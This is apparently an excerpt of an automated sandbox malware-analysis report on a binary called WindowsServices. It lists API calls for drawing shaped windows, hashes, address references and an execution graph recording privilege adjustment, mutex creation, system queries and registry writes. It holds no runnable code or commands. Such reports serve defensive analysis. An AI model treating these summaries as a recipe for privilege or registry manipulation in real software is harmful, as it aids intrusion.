                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CompatibleCreateMetricsRectSystem$BitmapClientDrawIconIconicMessageModeSendWindow
                                                                        • String ID:
                                                                        • API String ID: 291364621-0
                                                                        • Opcode ID: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                        • Instruction ID: 6d70c99ac97023b5f14d40c01a2117d862bf0d83ff31a6fcaea798b65c65e005
                                                                        • Opcode Fuzzy Hash: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                        • Instruction Fuzzy Hash: 5FA1F971108341DFC314DF69C985E6BB7E9EBC8704F008A2EF596A3290D774E909CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A56
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A7E
                                                                          • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B21
                                                                          • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B4C
                                                                          • Part of subcall function 004039C0: Polygon.GDI32(?,?,?), ref: 00403B9A
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ABE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ADE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404AFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E9E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol$Polygon
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 2518728319-821843137
                                                                        • Opcode ID: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction ID: 1b864ce688a3351c981eaee8f36bd257d0a296356b300086fb8b46b6cfa255b8
                                                                        • Opcode Fuzzy Hash: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction Fuzzy Hash: FAB1B1FA9A03007ED200F6619C82D6BBB6CDAF8B15F40DD0EB559610C3B9BCD304867A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00405316
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                          • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403F95
                                                                          • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403FBF
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                          • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                          • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040543E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040545E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040547E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040549E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040551E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040553E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040555E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040557E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040559E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040561E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040563E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040565E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040567E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040569E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040571E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040573E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040575E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$CreatePolygon$Combine_ftol
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 3890769595-821843137
                                                                        • Opcode ID: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                        • Instruction ID: 87a306119b05220822c14238118f6d845cb676b63f2a489d8e55d3df45724c17
                                                                        • Opcode Fuzzy Hash: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                        • Instruction Fuzzy Hash: 09B1B2FA9803003ED200F661DC82D6BBB6CD9F8B11F40DE0EB559610C6B97CDB1486BA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Graph data (image not reproduced): basic blocks 404ec0 to 4052b7, a chain of CopyRect calls each followed by call 403c20, with short fall-through blocks between them
                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ED6
                                                                          • Part of subcall function 00403C20: _ftol.MSVCRT ref: 00403D58
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404F10
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon14$Polygon15$Polygon16$Polygon17$Polygon2$Polygon3$Polygon31$Polygon32$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 1144628616-677921438
                                                                        • Opcode ID: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
                                                                        • Instruction ID: 8a5b5832819b54604f0eb40b5f2cfffe4246f56c5ea39582f8810119041c68d6
                                                                        • Opcode Fuzzy Hash: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
                                                                        • Instruction Fuzzy Hash: EDA1C3BB6443103AE210B259AC42EAB676CDBE8724F408C3BF958D11C1F57DDA18C7B6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Graph data (image not reproduced): basic blocks 40b10f to 40b260, the CRT startup sequence (__set_app_type, __p__fmode, __p__commode, __setusermatherr, _initterm, __getmainargs, GetStartupInfoA, GetModuleHandleA, exit, _XcptFilter)
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                        • String ID:
                                                                        • API String ID: 801014965-0
                                                                        • Opcode ID: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
                                                                        • Instruction ID: 92e6429448b312161c6c86a2e6f2100586677b1d17cdbc89596afef87365b123
                                                                        • Opcode Fuzzy Hash: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
                                                                        • Instruction Fuzzy Hash: 68416FB5800344EFDB209FA5D889AAE7BB8EB09714F20067FE551A72E1D7784841CB9C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Graph data (image not reproduced): basic blocks 404360 to 404667, an _ftol loop followed by CreatePolygonRgn and CombineRgn calls
                                                                        APIs
                                                                        • _ftol.MSVCRT ref: 0040450A
                                                                        • _ftol.MSVCRT ref: 00404538
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00404560
                                                                        • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404585
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040458F
                                                                        • CombineRgn.GDI32(?,?,?,00000002), ref: 004045C3
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 004045CB
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreatePolygon$Combine_ftol
                                                                        • String ID:
                                                                        • API String ID: 2242366081-0
                                                                        • Opcode ID: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
                                                                        • Instruction ID: 39bea9fad0b66382f5372ed494b3add627d4de448e91ddc4441a9f07906a4bc8
                                                                        • Opcode Fuzzy Hash: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
                                                                        • Instruction Fuzzy Hash: B09156B19083419FC310DF29C985A5BBBE4FFC4750F018A2EF999A7291DB34D814CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Graph data (image not reproduced): basic blocks 403e10 to 4040e6, an _ftol loop followed by CreatePolygonRgn and CombineRgn calls
                                                                        APIs
                                                                        • _ftol.MSVCRT ref: 00403F95
                                                                        • _ftol.MSVCRT ref: 00403FBF
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                        • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                        • CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreatePolygon$Combine_ftol
                                                                        • String ID:
                                                                        • API String ID: 2242366081-0
                                                                        • Opcode ID: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
                                                                        • Instruction ID: d78316a0bae83b4357ed0e5d5a94130920efe7575c7a00bd962797de7769c8fd
                                                                        • Opcode Fuzzy Hash: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
                                                                        • Instruction Fuzzy Hash: 189179B1A083419FC310DF25C985A5BBBF4FF88714F118A2DF99AA7291DB34D914CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateCompatibleDC.GDI32(?), ref: 00409EBE
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 00409EDA
                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409EFB
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 00409F22
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 00409F3E
                                                                        • GetWindowRect.USER32(?,?), ref: 00409F87
                                                                        • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 00409FFA
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CompatibleCreate$BitmapModeRectWindow
                                                                        • String ID:
                                                                        • API String ID: 1654611898-0
                                                                        • Opcode ID: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                        • Instruction ID: 387955213cf341242af21f02e85b7fd3331607f5cb7a19bffeb898acdc1f93f5
                                                                        • Opcode Fuzzy Hash: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                        • Instruction Fuzzy Hash: 997127711183409FC314DF64C88496FBBF8EBC9704F108A2EF6A693291DB79E905CB96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00401000: CopyRect.USER32(?,0040E020), ref: 0040100D
                                                                        • _ftol.MSVCRT ref: 00409CF7
                                                                        • _ftol.MSVCRT ref: 00409D0E
                                                                        • _ftol.MSVCRT ref: 00409D2B
                                                                        • GetWindowRect.USER32(?,?), ref: 00409D86
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 00402516
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040253E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040255E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040257E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040259E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025BE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025DE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025FE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040261E
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 00409DBF
                                                                        • SetCapture.USER32(?), ref: 00409DC9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Copy$_ftol$Window$Capture
                                                                        • String ID:
                                                                        • API String ID: 1685161017-0
                                                                        • Opcode ID: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                        • Instruction ID: 353ad75620bb99855249955aa37f7dffc4285601670c8d5eecd51fb0f0ccdc6c
                                                                        • Opcode Fuzzy Hash: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                        • Instruction Fuzzy Hash: 1F416DB12187068FC304DF7AC98595BBBE8FBC8704F044A3EB49993381DB74E9098B56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 1505 40a940-40a999 GetWindowRect 1506 40aa54-40aa7e ClientToScreen call 40b08a 1505->1506 1507 40a99f-40a9a0 1505->1507 1509 40aa83-40aabc call 40adcc 1506->1509 1507->1509 1510 40a9a6-40a9a8 1507->1510 1511 40a9b2-40a9e6 call 4052c0 _ftol 1510->1511 1512 40a9aa-40a9ac 1510->1512 1511->1509 1517 40a9ec-40a9f1 1511->1517 1512->1509 1512->1511 1517->1509 1518 40a9f7-40aa4b call 40afbe GetWindowRect call 40afb8 call 405300 SetWindowRgn 1517->1518 1525 40aa4d call 40a440 1518->1525 1526 40aa52 1525->1526 1526->1509
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A97F
                                                                        • _ftol.MSVCRT ref: 0040A9D4
                                                                        • GetWindowRect.USER32(?,?), ref: 0040AA11
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040AA45
                                                                        • ClientToScreen.USER32(?,?), ref: 0040AA5D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClientScreen_ftol
                                                                        • String ID:
                                                                        • API String ID: 2665761307-0
                                                                        • Opcode ID: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                        • Instruction ID: a66530a9fee688cda4384b7b61b220c0551d436bf9aef3ce9762855fe69dfb7b
                                                                        • Opcode Fuzzy Hash: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                        • Instruction Fuzzy Hash: 58413C752047059FC714DF25C98492BB7E9FBC8B04F004A2EF98693790DB38E909CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: _ftol$CreatePolygonRegion
                                                                        • String ID:
                                                                        • API String ID: 4272746700-0
                                                                        • Opcode ID: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                        • Instruction ID: bbc22f1e7c48a6dab8c73f5009b7f3ca445a8864c2917b6fdd274eb9f33cd00a
                                                                        • Opcode Fuzzy Hash: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                        • Instruction Fuzzy Hash: FF5113B5A087029FC300DF25C58491ABBF4FF88750F118A6EF895A2391EB35D925CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:18.5%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:35
                                                                        Total number of Limit Nodes:2
                                                                        execution_graph 834 b3a893 835 b3a89d AdjustTokenPrivileges 834->835 837 b3a91b 835->837 838 b3ab92 840 b3abc6 CreateMutexW 838->840 841 b3ac41 840->841 842 b3aa15 844 b3aa46 NtQuerySystemInformation 842->844 845 b3aa90 844->845 846 b3a67b 847 b3a6ae LookupPrivilegeValueW 846->847 849 b3a6fe 847->849 806 b3a602 807 b3a62e FindCloseChangeNotification 806->807 808 b3a66d 806->808 809 b3a63c 807->809 808->807 850 b3a462 852 b3a486 RegSetValueExW 850->852 853 b3a507 852->853 854 b3a361 855 b3a392 RegQueryValueExW 854->855 857 b3a41b 855->857 814 b3abc6 816 b3abfe CreateMutexW 814->816 817 b3ac41 816->817 818 b3aa46 819 b3aaa6 818->819 820 b3aa7b NtQuerySystemInformation 818->820 819->820 821 b3aa90 820->821 862 b3a5e4 865 b3a602 FindCloseChangeNotification 862->865 864 b3a63c 865->864 826 b3a8ca 827 b3a8f9 AdjustTokenPrivileges 826->827 829 b3a91b 827->829

                                                                        Callgraph

